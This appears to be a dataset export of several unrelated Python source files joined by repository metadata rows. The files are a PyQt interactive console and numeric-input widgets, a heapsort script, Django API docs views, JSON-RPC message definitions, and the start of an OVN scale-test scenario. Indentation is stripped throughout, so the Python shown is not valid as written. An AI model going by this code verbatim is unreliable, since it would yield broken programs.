# We actually want the index of the nth match
index = expression.pos(nth)
length = len(str(expression.cap(nth)))
self.setFormat(index, length, format)
index = expression.indexIn(text, index + length)
self.setCurrentBlockState(0)
# Do multi-line strings
in_multiline = self.match_multiline(text, *self.tri_single)
if not in_multiline:
in_multiline = self.match_multiline(text, *self.tri_double)
def match_multiline(self, text, delimiter, in_state, style):
# If inside triple-single quotes, start at 0
if self.previousBlockState() == in_state:
start = 0
add = 0
# Otherwise, look for the delimiter on this line
else:
start = delimiter.indexIn(text)
# Move past this match
add = delimiter.matchedLength()
# As long as there's a delimiter match on this line...
while start >= 0:
# Look for the ending delimiter
end = delimiter.indexIn(text, start + add)
# Ending delimiter on this line?
if end >= add:
length = end - start + add + delimiter.matchedLength()
self.setCurrentBlockState(0)
# No; multi-line string
else:
self.setCurrentBlockState(in_state)
length = len(str(text)) - start + add
# Apply formatting
self.setFormat(start, length, style)
# Look for the next match
start = delimiter.indexIn(text, start + length)
class PythonConsole(QtGui.QFrame):
import re
findIdentifier = re.compile(r'([a-zA-Z0-9.]*)$')
def __init__(self, *args):
QtGui.QFrame.__init__(self, *args)
# Set layout and split the results field (top) and the command field (bottom)
self.layout = QtGui.QVBoxLayout(self)
self.splitter = QtGui.QSplitter(QtCore.Qt.Vertical, self)
self.splitter.setOpaqueResize(1)
self.layout.addWidget(self.splitter)
# Initialise environment
self.environment = {}
# Build result widget
self.resultWidget = QtGui.QTextEdit(self.splitter)
self.resultWidget.setReadOnly(True)
self.resultWidget.setFont(QtGui.QFont('Courier New', 8, QtGui.QFont.Normal, 0))
self.resultWidget.setMinimumHeight(50)
self.resultWidget.setTabStopWidth(20)
self.resultHighlighter = PythonHighlighter(self.resultWidget)
# Insert a welcome message to results
import sys
welcomeMsg = 'Welcome to Python Earthling\n' + sys.version + '\n\n'
self.resultWidget.setText(welcomeMsg)
# Build command widget
self.commandWidget = QCommandEntryWidget(self.splitter)
self.commandWidget.setFont(QtGui.QFont('Courier New', 8, QtGui.QFont.Normal, 0))
self.commandWidget.setMinimumHeight(28)
self.commandWidget.setTabStopWidth(20)
self.commandHighlighter = PythonHighlighter(self.commandWidget)
self.connect(self.commandWidget, QtCore.SIGNAL('enterPressed()'), self.enterCommand)
self.connect(self.commandWidget, QtCore.SIGNAL('tabPressed()'), self.tabCommand)
# Define text formats
self.normalTextFormat = QtGui.QTextCharFormat()
self.normalTextFormat.setFontWeight(QtGui.QFont.Normal)
self.resultTextFormat = QtGui.QTextCharFormat()
self.resultTextFormat.setForeground(QtGui.QColor(40, 40, 200))
self.resultTextFormat.setFontWeight(QtGui.QFont.Normal)
self.suggestionTextFormat = QtGui.QTextCharFormat()
self.suggestionTextFormat.setForeground(QtGui.QColor(20, 160, 20))
self.suggestionTextFormat.setFontWeight(QtGui.QFont.Normal)
self.errorTextFormat = QtGui.QTextCharFormat()
self.errorTextFormat.setForeground(QtGui.QColor(200, 40, 40))
self.errorTextFormat.setFontWeight(QtGui.QFont.Normal)
# Initialise history and set actions to scroll up and down through the history
self.history = []
self.historyPosition = 0
self.previousHistoryAction = QtGui.QAction('Previous History', self)
self.previousHistoryAction.setShortcut(QtGui.QKeySequence('Alt+Up'))
self.nextHistoryAction = QtGui.QAction('Previous History', self)
self.nextHistoryAction.setShortcut(QtGui.QKeySequence('Alt+Down'))
self.previousHistoryAction.triggered.connect(self.previousHistory)
self.nextHistoryAction.triggered.connect(self.nextHistory)
self.commandWidget.addAction(self.previousHistoryAction)
self.commandWidget.addAction(self.nextHistoryAction)
self.buildMenuBar()
# IO redirection
self.stdout = self._Stdout(self.resultWidget)
self.stderr = self._Stderr(self.resultWidget)
self.runCommand('from Ops import Runtime')
self.runCommand('runtime = Runtime.getInstance()')
self.runCommand('interface = runtime.interface')
self.clearHistory()
def buildMenuBar(self):
# Set actions and shortcuts
cutShortcut = QtGui.QKeySequence(QtGui.QKeySequence.Cut).toString()
copyShortcut = QtGui.QKeySequence(QtGui.QKeySequence.Copy).toString()
pasteShortcut = QtGui.QKeySequence(QtGui.QKeySequence.Paste).toString()
self.scriptSaveAction = QtGui.QAction('Save Script...', self)
self.scriptLoadAction = QtGui.QAction('Load Script...', self)
self.scriptSaveHistoryAction = QtGui.QAction('Save History...', self)
self.scriptFetchHistoryAction = QtGui.QAction('Fetch History', self)
self.scriptClearHistoryAction = QtGui.QAction('Clear History', self)
self.scriptSaveAction.triggered.connect(self.saveScript)
self.scriptLoadAction.triggered.connect(self.loadScript)
self.scriptSaveHistoryAction.triggered.connect(self.saveHistory)
self.scriptFetchHistoryAction.triggered.connect(self.fetchHistory)
self.scriptClearHistoryAction.triggered.connect(self.clearHistory)
self.editClearAction = QtGui.QAction('Clear', self)
self.editCutAction = QtGui.QAction('Cut\t%s' % cutShortcut, self)
self.editCopyAction = QtGui.QAction('Copy\t%s' % copyShortcut, self)
self.editPasteAction = QtGui.QAction('Paste\t%s' % pasteShortcut, self)
self.editClearAction.triggered.connect(self.clear)
self.editCutAction.triggered.connect(self.cut)
self.editCopyAction.triggered.connect(self.copy)
self.editPasteAction.triggered.connect(self.paste)
# Create menus
self.menuBar = QtGui.QMenuBar(self)
self.layout.setMenuBar(self.menuBar)
self.scriptMenu = QtGui.QMenu('Script')
self.menuBar.addMenu(self.scriptMenu)
self.scriptMenu.addAction(self.scriptSaveAction)
self.scriptMenu.addAction(self.scriptLoadAction)
self.scriptMenu.addSeparator()
self.scriptMenu.addAction(self.scriptSaveHistoryAction)
self.scriptMenu.addAction(self.scriptFetchHistoryAction)
self.scriptMenu.addAction(self.scriptClearHistoryAction)
self.editMenu = QtGui.QMenu('Edit')
self.menuBar.addMenu(self.editMenu)
self.editMenu.addAction(self.editClearAction)
self.editMenu.addAction(self.editCutAction)
self.editMenu.addAction(self.editCopyAction)
self.editMenu.addAction(self.editPasteAction)
def saveScript(self):
filename = QtGui.QFileDialog.getSaveFileName(self, 'Save Script', selectedFilter='*.py')
if filename and filename[0]:
filename = str(filename[0])
file(filename, 'wt').write(self.commandWidget.toPlainText())
def loadScript(self):
filename = QtGui.QFileDialog.getOpenFileName(self, 'Load Script', selectedFilter='*.py')
if filename and filename[0]:
filename = str(filename[0])
commands = file(filename, 'rt').read()
self.commandWidget.clear()
self.commandWidget.setText(commands)
self.commandWidget.moveCursor(QtGui.QTextCursor.End, QtGui.QTextCursor.MoveAnchor)
self.commandWidget.setFocus()
def historyToString(self):
return '\n'.join(self.history)
def saveHistory(self):
filename = QtGui.QFileDialog.getSaveFileName(self, 'Save History', selectedFilter='*.py')
if filename and filename[0]:
filename = str(filename[0])
file(filename, 'wt').write(self.historyToString())
def fetchHistory(self):
self.commandWidget.clear()
self.commandWidget.setText(self.historyToString())
self.commandWidget.moveCursor(QtGui.QTextCursor.End, QtGui.QTextCursor.MoveAnchor)
self.commandWidget.setFocus()
def clearHistory(self):
self.history = []
def clear(self):
self.resultWidget.clear()
def cut(self):
if (len(str(self.commandWidget.textCursor().selectedText()))):
self.commandWidget.cut()
else:
self.resultWidget.cut()
def copy(self):
if (len(str(self.commandWidget.textCursor().selectedText()))):
self.commandWidget.copy()
else:
self.resultWidget.copy()
def paste(self):
self.commandWidget.paste()
def previousHistory(self):
# Triggered using Alt+Up
# Find the previous (decremented position) in the history and insert it in the right
# place in the command field if available
self.historyPosition = min(self.historyPosition + 1, len(self.history))
if not self.historyPosition:
self.commandWidget.clear()
else:
self.commandWidget.setText(self.history[-self.historyPosition])
self.commandWidget.moveCursor(QtGui.QTextCursor.End, QtGui.QTextCursor.MoveAnchor)
def nextHistory(self):
# Triggered using Alt+Down
# Find the next (incremented position) in the history and insert it in the right
# place in the command field if available
self.historyPosition = max(self.historyPosition - 1, 0)
if not self.historyPosition:
self.commandWidget.clear()
else:
self.commandWidget.setText(self.history[-self.historyPosition])
self.commandWidget.moveCursor(QtGui.QTextCursor.End, QtGui.QTextCursor.MoveAnchor)
def echoCommand(self, command, format=None):
# Print the command to the result field
# Set a default text format if it hasn't been supplied
if format is None: format = self.normalTextFormat
# Split the lines
lines = command.splitlines()
if lines and not lines[-1].strip():
del lines[-1]
self.resultWidget.moveCursor(QtGui.QTextCursor.End, QtGui.QTextCursor.MoveAnchor)
for line in lines:
textCursor = self.resultWidget.textCursor()
# textCursor.insertText(">> ", format)
textCursor.insertText("%s\n" % line, format)
def enterCommand(self):
# Execute the command as the user just pressed Ctrl-Enter or Ctrl-Return
# Get the position of the text cursor and get the command from the command field
cursor = self.commandWidget.textCursor()
command = str(self.commandWidget.toPlainText())
# Maya behaviour:
# If the user has selected a particular bit of command text we keep it, otherwise
# we clear the command field
if cursor.hasSelection():
start, end = cursor.selectionStart(), cursor.selectionEnd()
command = command[start:end]
else:
self.commandWidget.setText('')
self.commandWidget.textCursor().setPosition(0)
# Echo the command to the result field and execute the command
self.echoCommand(command, format=self.resultTextFormat)
self.runCommand(command)
def tabCommand(self):
# Print command completion if the user presses the tab key
# Create a completer
import rlcompleter, os
completer = rlcompleter.Completer(self.environment)
# Get the text we just wrote and look for the nearest identifier
index = self.commandWidget.textCursor().position()
if index == 0:
text = ''
else:
text = str(self.commandWidget.toPlainText())[:index]
match = self.findIdentifier.search(text)
if match: text = match.group(1)
# Remember the length of the text we wrote for later when we want to
# add to it
textOriginalLength = len(text)
# Try to find all the states (suggestions) available for the command text
# Collect the available options to a list and build a cache to avoid repetitions
options = []
cache = {}
try:
currentState = 0
while True:
result = completer.complete(text, currentState)
currentState += 1
if result is None: break
if cache.has_key(result): continue
cache[result] = True
options.append(result)
except TypeError as e:
print (str(e))
if len(options) == 0: return
# Check it's not the same as what we just wrote
if len(options) == 1 and options[0] != text:
self.commandWidget.insertPlainText(options[0][textOriginalLength:])
else:
commonPrefix = os.path.commonprefix(options)
if len(commonPrefix) > textOriginalLength:
self.commandWidget.insertPlainText(commonPrefix[textOriginalLength:])
self.resultWidget.textCursor().insertText(' '.join(options) + '\n', self.suggestionTextFormat)
self.resultWidget.moveCursor(QtGui.QTextCursor.End, QtGui.QTextCursor.MoveAnchor)
def runCommand(self, command):
# Add the command to history (even if it fails) and only store the last 100 entries
self.history.append(command)
self.history = self.history[-1000:]
self.historyPosition = 0
# Standard streams
import sys
old_stdout = sys.stdout
old_stderr = sys.stderr
sys.stdout = self.stdout
sys.stderr = self.stderr
# Evaluate/execute command and report results
try:
result = None
try:
self.resultWidget.moveCursor(QtGui.QTextCursor.End, QtGui.QTextCursor.MoveAnchor)
result = eval(command, self.environment, self.environment)
except SyntaxError:
exec (command, self.environment)
# Check if the evaluation was successful and if so report it in the results field
# Add the results to the environment
if result is not None:
message = str(result)
self.environment['_'] = message
self.echoCommand(message)
except:
# Get the traceback information and add the formatted output to the results field
import traceback, sys
exceptionType, exception, tb = sys.exc_info()
entries = traceback.extract_tb(tb)
entries.pop(0)
# Build and print a list containing the error report
lines = []
if entries:
lines += traceback.format_list(entries)
lines += traceback.format_exception_only(exceptionType, exception)
for line in lines:
self.echoCommand(line, format=self.errorTextFormat)
finally:
# Restore streams
sys.stdout = old_stdout
sys.stderr = old_stderr
self.resultWidget.moveCursor(QtGui.QTextCursor.End, QtGui.QTextCursor.MoveAnchor)
class _Stdout:
def __init__(self, resultWidget):
self.resultWidgetRef = weakref.ref(resultWidget)
self.stdoutTextFormat = QtGui.QTextCharFormat()
self.stdoutTextFormat.setFontWeight(QtGui.QFont.Normal)
def write(self, msg):
widget = self.resultWidgetRef()
if not widget: return
widget.textCursor().insertText(msg, self.stdoutTextFormat)
widget.textCursor().movePosition(QtGui.QTextCursor.End)
def flush(self):
pass
class _Stderr:
def __init__(self, resultWidget):
self.resultWidgetRef = weakref.ref(resultWidget)
self.errorTextFormat = QtGui.QTextCharFormat()
self.errorTextFormat.setForeground(QtGui.QColor(200, 40, 40))
self.errorTextFormat.setFontWeight(QtGui.QFont.Normal)
def write(self, msg):
widget = self.resultWidgetRef()
if not widget: return
widget.textCursor().insertText(msg, self.errorTextFormat)
widget.textCursor().movePosition(QtGui.QTextCursor.End)
def flush(self):
pass
class QfloatWidget(QtGui.QLineEdit):
''' draggable spin box. ctrl+ left, middle or right button will scrub the values in the spinbox
by different amounts
'''
valueChanged = QtCore.Signal(list)
def __init__(self, parent=None):
super(QfloatWidget, self).__init__(parent)
# self.setDecimals(4)
# self.setButtonSymbols(QtGui.QAbstractSpinBox.NoButtons)
# self.setKeyboardTracking(False) # don't emit 3 times when typing 100
self.minstep = 0.001
self._dragging = False
self.setContextMenuPolicy(QtCore.Qt.PreventContextMenu) # no copy/paste menu to interfere with dragging
# catch the mouse events from the lineedit that is a child of the spinbox
# editor = self.findChild(QtGui.QLineEdit)
self.installEventFilter(self)
self.editingFinished.connect(functools.partial(self.handleEditingFinished))
# Initialise the current value
self.current_value = None
# Create a new Validator
# dblValidator = QtGui.QDoubleValidator(self)
dbl_validator = floatValidator(self)
self.setValidator(dbl_validator)
# Initialise the Range variables to nothing.
self.setRange()
def handleEditingFinished(self):
self.setValue(self.text())
def setValue(self, v):
v = float(v) # ensure it's a float!
if self.current_value == v: return
self.current_value = v
self.setText(str(v))
# if not self._dragging:
self.valueChanged.emit(v)
# Constrains the spin box to between two values
def setRange(self, min=None, max=None):
try:
self.validator().setRange(min, max)
# print ("Valid from {} to {}".format(str(self.validator().bottom()), str(self.validator().top())))
except:
print ("Inputs to QfloatWidget.setRange() are invalid with values {} and {}".format(min, max))
# Allows the box to be locked or unlocked
# Defaults to true so foo.setLocked() would lock "foo"
def setLocked(self, status=True):
assert isinstance(status, bool), "Lock value is not a boolean"
self.setReadOnly(status)
def value(self):
return float(self.text())
def text(self):
ret = super(QfloatWidget, self).text()
return ret
def eventFilter(self, obj, event):
if event.type() == QtGui.QMouseEvent.MouseButtonPress:
if not event.modifiers() & QtCore.Qt.ControlModifier:
return False
self.gpx, self.gpy = event.globalX(), event.globalY()
self.startX, self.startY = event.x(), event.y()
if event.button() & QtCore.Qt.LeftButton:
self._dragging = self.minstep
if event.button() & QtCore.Qt.MiddleButton:
self._dragging = self.minstep * 100
if event.button() & QtCore.Qt.RightButton:
self._dragging = self.minstep * 10000
return True
elif event.type() == QtGui.QMouseEvent.MouseButtonRelease:
if self._dragging is not False:
self._dragging = False
self.setValue(self.text())
else:
self._dragging = False
return True
elif event.type() == QtGui.QMouseEvent.MouseMove:
if self._dragging:
if not self.isReadOnly():
newValue = (self.value() + (event.x() - self.startX) * self._dragging)
if self.validator().bottom() is not None or self.validator().top() is not None:
newValue = np.clip(newValue, self.validator().bottom(), self.validator().top())
self.setValue(newValue)
QtGui.QCursor.setPos(self.gpx, self.gpy)
return True
return False
class QvectorWidget(QtGui.QWidget):
valueChanged = QtCore.Signal(list)
def __init__(self, size, parent=None):
super(QvectorWidget, self).__init__(parent)
self.vector = np.zeros(size, dtype=np.float32)
layout = QtGui.QHBoxLayout()
for vi in range(size):
w = QfloatWidget(self)
layout.addWidget(w)
w.valueChanged.connect(functools.partial(self.handleValueChanged, vi), QtCore.Qt.DirectConnection)
layout.setContentsMargins(0, 0, 0, 0)
self.blockSignals = False
self.setLayout(layout)
def handleValueChanged(self, vi, v):
self.vector[vi] = v
if not self.blockSignals:
self.valueChanged.emit(self.vector)
def setValue(self, v):
self.blockSignals = True
self.vector[:] = v
for vi, v in enumerate(self.vector):
self.layout().itemAt(vi).widget().setValue(v)
self.blockSignals = False
class QmatrixWidget(QtGui.QWidget):
valueChanged = QtCore.Signal(list)
'''
this should be replaced with qdatawidget mappers and a proper qt model of the retargetting
data structure
'''
def __init__(self, rows, cols, parent=None):
super(QmatrixWidget, self).__init__(parent)
self.rows = rows
self.cols = cols
self.matrix = np.zeros((rows, cols), dtype=np.float32)
self.blockSignals = False
layout = QtGui.QVBoxLayout()
for ri in range(rows):
row = QvectorWidget(cols, self)
row.valueChanged.connect(functools.partial(self.handleValueChanged, ri), QtCore.Qt.DirectConnection)
layout.addWidget(row)
layout.setContentsMargins(0, 0, 0, 0)
self.setLayout(layout)
def handleValueChanged(self, ri, v):
self.matrix[ri, :] = v
if not self.blockSignals:
self.valueChanged.emit(self.matrix)
def setValue(self, v):
self.blockSignals = True
self.matrix[:, :] = v.copy()
for ri, rv in enumerate(self.matrix):
self.layout().itemAt(ri).widget().setValue(rv)
self.blockSignals = False
class QKeySequenceEdit(QtGui.QLineEdit):
''' line edit for capturing key sequences. use in a keyboard shortcut editor (although probably
better as labels on a button rather than a line edit'''
def __init__(self, *args):
super(QKeySequenceEdit, self).__init__(*args)
self.keySequence = None
def setKeySequence(self, keySequence):
self.keySequence = keySequence
self.setText(self.keySequence.toString(QtGui.QKeySequence.NativeText))
def keyPressEvent(self, event):
if event.type() == QtCore.QEvent.KeyPress:
key = event.key()
if key == QtCore.Qt.Key_unknown:
return
# just a modifier? Ctrl, Shift, Alt, Meta.
if key in [QtCore.Qt.Key_Control, QtCore.Qt.Key_Shift, QtCore.Qt.Key_Alt, QtCore.Qt.Key_Meta]:
# print("Single click of special key: Ctrl, Shift, Alt or Meta")
# print("New KeySequence:", QtGui.QKeySequence(key).toString(QtGui.QKeySequence.NativeText))
return
# check for a combination of user clicks
modifiers = event.modifiers()
if modifiers & QtCore.Qt.ShiftModifier: key += QtCore.Qt.SHIFT
if modifiers & QtCore.Qt.ControlModifier: key += QtCore.Qt.CTRL
if modifiers & QtCore.Qt.AltModifier: key += QtCore.Qt.ALT
if modifiers & QtCore.Qt.MetaModifier: key += QtCore.Qt.META
self.setKeySequence(QtGui.QKeySequence(key))
event.accept()
class intValidator(QtGui.QValidator):
def __init__(self, parent=None):
QtGui.QValidator.__init__(self, parent)
self.parent = parent
self.min_value = None
self.max_value = None
def setRange(self, min=None, max=None):
try:
self.min_value = None if min is None else int(min)
self.max_value = None if max is None else int(max)
except ValueError:
assert False, "Incorrect value types for floatValidator.setRange()"
def bottom(self):
return self.min_value
def top(self):
return self.max_value
def validate(self, text, length):
if len(text) == 0 or text == "-": return (QtGui.QValidator.Intermediate)
if self.parent.hasFocus():
try:
value = int(text)
except ValueError:
return (QtGui.QValidator.Invalid)
else:
try:
value = int(text)
except ValueError:
return (QtGui.QValidator.Invalid)
value = int(text)
if self.min_value is not None and value < self.min_value: return (QtGui.QValidator.Invalid)
if self.max_value is not None and value > self.max_value: return (QtGui.QValidator.Invalid)
return (QtGui.QValidator.Acceptable)
def fixup(self, input):
if input == "" or input == "-":
self.parent.setText(str(self.min_value) if self.min_value is not None else 0)
else:
if self.min_value is not None or self.max_value is not None:
value = np.clip(int(input), self.min_value, self.max_value)
self.parent.setText(str(value))
class floatValidator(QtGui.QValidator):
def __init__(self, parent=None):
from re import compile as re_compile
QtGui.QValidator.__init__(self, parent)
self.parent = parent
self.min_value = None
self.max_value = None
# RegExp for a valid number including scientific notation
self._re = re_compile("^[-+]?[0-9]*\.?[0-9]*([eE][-+]?[0-9]*)?$")
def setRange(self, min=None, max=None):
try:
self.min_value = None if min is None else float(min)
self.max_value = None if max is None else float(max)
except ValueError:
assert False, "Incorrect value types for floatValidator.setRange()"
def bottom(self):
return self.min_value
def top(self):
return self.max_value
def validate(self, text, length):
if len(text) == 0: return (QtGui.QValidator.Intermediate)
if self.parent.hasFocus():
if not self._re.match(text):
return (QtGui.QValidator.Invalid)
else:
try:
value = float(text)
except ValueError:
return (QtGui.QValidator.Invalid)
if self.min_value is not None and value < self.min_value: return (QtGui.QValidator.Invalid)
if self.max_value is not None and value > self.max_value: return (QtGui.QValidator.Invalid)
return (QtGui.QValidator.Acceptable)
def fixup(self, input):
if input == "":
self.parent.setText(str(self.min_value) if self.min_value is not None else 0.0)
else:
try:
value = float(input)
except ValueError: # Error is with an incomplete scientific notation
input = input[:input.find("e")]
value = float(value)
if self.min_value is not None or self.max_value is not None:
value = np.clip(value, self.min_value, self.max_value)
self.parent.setText(str(value))
if __name__ == '__main__':
import sys
# from UI import QAppCtx
app = QtGui.QApplication(sys.argv)
app.setStyle('plastique')
# with QAppCtx():
# dialog = QmatrixWidget(3,4,None)
# def p(*x): print (x)
# dialog.valueChanged.connect(p)
# dialog.setValue(np.eye(3,4))
# dialog.show()
# def modeSelectCB(mode,val):
# print (mode,val)
# options = ['orig','proj','proj_freeze','synth','diff']
# win = Qselect(options = options, default = 'diff', cb = modeSelectCB)
# win.show()
listWidget = QOrderedListWidget(['Hello', 'World', 'this', 'is', 'a', 'test'])
listWidget.setStyleSheet("border:0;")
listWidget.show()
def testCB(*x): print ("Value is: {}".format(x))
slideWidgetHolder = QtGui.QGroupBox()
slideWidget = QslideLimitValue("Test Slider", 0, -180, 180, testCB, "Slider")
# layout = QtGui.QHBoxLayout()
# layout.setContentsMargins(0,0,0,0)
# layout.addWidget(slideWidget.slider)
# layout.addWidget(slideWidget.display)
slideWidgetHolder.setLayout(slideWidget)
slideWidgetHolder.show()
slideWidget2 = QslideLimitControl()
slideWidget2.show()
app.connect(app, QtCore.SIGNAL('lastWindowClosed()'), app.quit)
sys.exit(app.exec_())
| mit | -1,527,965,147,184,060,700 | 32.641414 | 135 | 0.714495 | false |
samueljackson92/scripts | python/heapsort.py | 1 | 1562 | # heapsort.py
# Date: 15/06/13
# Author: Samuel Jackson ([email protected])
# Description: Python implementation of a basic heapsort.
# Based heavily on the example code from http://en.wikipedia.org/wiki/Heapsort
import random
def swap(data, i, j):
temp = data[i]
data[i] = data[j]
data[j] = temp
#convert our data into a max-order heap in place in the array
def heapify(data):
#get position of last parent node in heap
start = (len(data) -1) / 2
while (start >= 0):
#sift down from start such that all nodes below start are then in place
siftDown(data, start, len(data)-1)
start = start -1
#Re-organize the heap from a given point in the list to a given end point
def siftDown(data, start, end):
root = start
#while root has at least one child
while (root * 2 + 1 <= end):
child = root * 2 + 1 #get left child
swapNode = root #keep track of node to swap with
#check if left child needs to be swapped
if(data[swapNode] < data[child]):
swapNode = child
#check if right child exists and needs to be swapped
if(child+1 <= end and data[swapNode] < data[child+1]):
swapNode = child+1
#check if we need to swap
if(swapNode != root):
swap(data, root, swapNode)
root = swapNode
else:
return
def heap_sort(data):
end = len(data) -1
#place data in max heap order
heapify(data)
while (end > 0):
#swap the max element to the end
print ">>", data
swap(data, 0, end)
end = end -1
#re-heapify the data
siftDown(data, 0, end)
d = random.sample(range(30), 10)
print d
heap_sort(d)
print d | mit | -2,002,207,885,747,726,000 | 21.014085 | 78 | 0.677977 | false |
DemocracyClub/yournextrepresentative | ynr/apps/api/views.py | 1 | 2639 | from collections import OrderedDict
from django.views.generic import TemplateView
from rest_framework.request import Request
from drf_yasg import openapi
from drf_yasg.generators import OpenAPISchemaGenerator
from elections.models import Election
class OpenAPISchemaMixin:
version = None
patterns = None
def _sort_ordered_dict_by_keys(self, od):
keys = sorted(list(od.keys()))
new_od = OrderedDict()
for key in keys:
if type(od[key]) == OrderedDict:
od[key] = self._sort_ordered_dict_by_keys(od[key])
new_od[key] = od[key]
return new_od
def get_schema(self):
schema = OpenAPISchemaGenerator(
openapi.Info(
title="Snippets API",
default_version="self.version",
description="Test description",
terms_of_service="https://www.google.com/policies/terms/",
contact=openapi.Contact(email="[email protected]"),
license=openapi.License(name="BSD License"),
),
patterns=self.patterns,
version="next",
)
request = Request(self.request)
schema_obj = schema.get_schema(request=request, public=True)
return self._sort_ordered_dict_by_keys(schema_obj)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context["schema"] = self.get_schema()
context["version"] = self.version
return context
class NextAPIDocsView(OpenAPISchemaMixin, TemplateView):
template_name = "api/next_home.html"
class APIDocsEndpointsView(OpenAPISchemaMixin, TemplateView):
template_name = "api/endpoints.html"
class APIDocsDefinitionsView(OpenAPISchemaMixin, TemplateView):
template_name = "api/definitions.html"
patterns = None
version = "next"
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context["schema"] = self.get_schema()
return context
class CSVListView(TemplateView):
template_name = "api/csv_list.html"
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
base_qs = Election.objects.all().order_by(
"current", "-election_date", "slug"
)
context["current_elections"] = base_qs.current()
context["future_elections"] = base_qs.future().exclude(current=True)
context["past_elections"] = base_qs.past().exclude(current=True)
return context
class ResultsDocs(TemplateView):
template_name = "api/results.html"
| agpl-3.0 | -4,075,647,256,769,377,000 | 29.686047 | 76 | 0.63471 | false |
seprich/py-bson-rpc | bsonrpc/definitions.py | 1 | 4837 | # -*- coding: utf-8 -*-
'''
Definitions to match messages to JSON RPC 2.0 schema and to produce them.
Also RPC error definitions.
'''
import six
from bsonrpc.exceptions import (
InternalError, InvalidParams, InvalidRequest, MethodNotFound,
ParseError, ServerError, UnspecifiedPeerError)
from bsonrpc.options import NoArgumentsPresentation
__license__ = 'http://mozilla.org/MPL/2.0/'
class Definitions(object):
def __init__(self, protocol, protocol_version, no_args):
self.protocol = protocol
self.protocol_version = protocol_version
self._no_args = no_args # Strategy to represent no args
def _set_params(self, msg, args, kwargs):
if not args and not kwargs:
if self._no_args == NoArgumentsPresentation.EMPTY_ARRAY:
msg['params'] = []
if self._no_args == NoArgumentsPresentation.EMPTY_OBJECT:
msg['params'] = {}
return msg
if args:
msg['params'] = args
else:
msg['params'] = kwargs
return msg
def request(self, msg_id, method_name, args, kwargs):
msg = {
self.protocol: self.protocol_version,
'id': msg_id,
'method': method_name,
}
msg = self._set_params(msg, args, kwargs)
return msg
def notification(self, method_name, args, kwargs):
msg = {
self.protocol: self.protocol_version,
'method': method_name,
}
msg = self._set_params(msg, args, kwargs)
return msg
def ok_response(self, msg_id, result):
return {
self.protocol: self.protocol_version,
'id': msg_id,
'result': result
}
def error_response(self, msg_id, error, details=None):
msg = {
self.protocol: self.protocol_version,
'id': msg_id,
'error': error
}
if details:
msg['error']['data'] = details
return msg
def _chk_protocol(self, msg):
return msg.get(self.protocol, None) == self.protocol_version
def _has_method(self, msg):
return isinstance(msg.get('method', None), six.string_types)
def _valid_params(self, msg):
return ('params' not in msg or isinstance(msg['params'], (list, dict)))
def is_request(self, msg):
return (self._chk_protocol(msg) and
self._has_method(msg) and
'id' in msg and
(msg['id'] is None or
isinstance(msg['id'], (six.string_types, int))) and
self._valid_params(msg))
def is_notification(self, msg):
return (self._chk_protocol(msg) and
self._has_method(msg) and
'id' not in msg and
self._valid_params(msg))
def is_response(self, msg):
result_and_no_error = 'result' in msg and 'error' not in msg
error_and_no_result = 'error' in msg and 'result' not in msg
return (self._chk_protocol(msg) and
isinstance(msg.get('id', None), (six.string_types, int)) and
(result_and_no_error or error_and_no_result))
def is_nil_id_error_response(self, msg):
error_and_no_result = 'error' in msg and 'result' not in msg
return (self._chk_protocol(msg) and
error_and_no_result and
'id' in msg and
msg['id'] is None)
def is_batch_request(self, msg_list):
if not msg_list:
return False
for msg in msg_list:
if not self.is_request(msg) and not self.is_notification(msg):
return False
return True
def is_batch_response(self, msg_list):
if not msg_list:
return False
for msg in msg_list:
if not self.is_response(msg):
return False
return True
class RpcErrors(object):
parse_error = {'code': -32700, 'message': 'Parse error'}
invalid_request = {'code': -32600, 'message': 'Invalid Request'}
method_not_found = {'code': -32601, 'message': 'Method not found'}
invalid_params = {'code': -32602, 'message': 'Invalid params'}
internal_error = {'code': -32603, 'message': 'Internal error'}
server_error = {'code': -32000, 'message': 'Server error'}
_promote = {
-32700: ParseError,
-32600: InvalidRequest,
-32601: MethodNotFound,
-32602: InvalidParams,
-32603: InternalError,
-32000: ServerError,
}
@classmethod
def error_to_exception(cls, error):
code = error.get('code', 0)
message = error.get('message', '')
data = error.get('data', '')
exception_cls = cls._promote.get(code, UnspecifiedPeerError)
return exception_cls(code, message, data)
| mpl-2.0 | 1,107,113,176,544,598,700 | 31.682432 | 79 | 0.565226 | false |
openvswitch/ovn-scale-test | rally_ovs/plugins/ovs/scenarios/ovn.py | 1 | 25304 | # Copyright 2016 Ebay Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from rally_ovs.plugins.ovs import scenario
from rally.task import atomic
from rally.common import logging
from rally import exceptions
from rally_ovs.plugins.ovs import ovnclients
from rally_ovs.plugins.ovs import utils
import random
import netaddr
from io import StringIO
LOG = logging.getLogger(__name__)
class OvnScenario(ovnclients.OvnClientMixin, scenario.OvsScenario):
RESOURCE_NAME_FORMAT = "lswitch_XXXXXX_XXXXXX"
def __init__(self, context=None):
super(OvnScenario, self).__init__(context)
self._init_conns(self.context)
def _init_conns(self, context):
self._ssh_conns = {}
if not context:
return
for sandbox in context["sandboxes"]:
sb_name = sandbox["name"]
farm = sandbox["farm"]
ovs_ssh = self.farm_clients(farm, "ovs-ssh")
ovs_ssh.set_sandbox(sb_name, self.install_method,
sandbox["host_container"])
ovs_ssh.enable_batch_mode()
self._ssh_conns[sb_name] = ovs_ssh
def _get_conn(self, sb_name):
return self._ssh_conns[sb_name]
def _flush_conns(self, cmds=[]):
for _, ovs_ssh in self._ssh_conns.items():
for cmd in cmds:
ovs_ssh.run(cmd)
ovs_ssh.flush()
'''
return: [{"name": "lswitch_xxxx_xxxxx", "cidr": netaddr.IPNetwork}, ...]
'''
@atomic.action_timer("ovn.create_lswitch")
def _create_lswitches(self, lswitch_create_args, num_switches=-1):
print("create lswitch")
return super(OvnScenario, self)._create_lswitches(lswitch_create_args, num_switches)
@atomic.optional_action_timer("ovn.list_lswitch")
def _list_lswitches(self):
print("list lswitch")
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
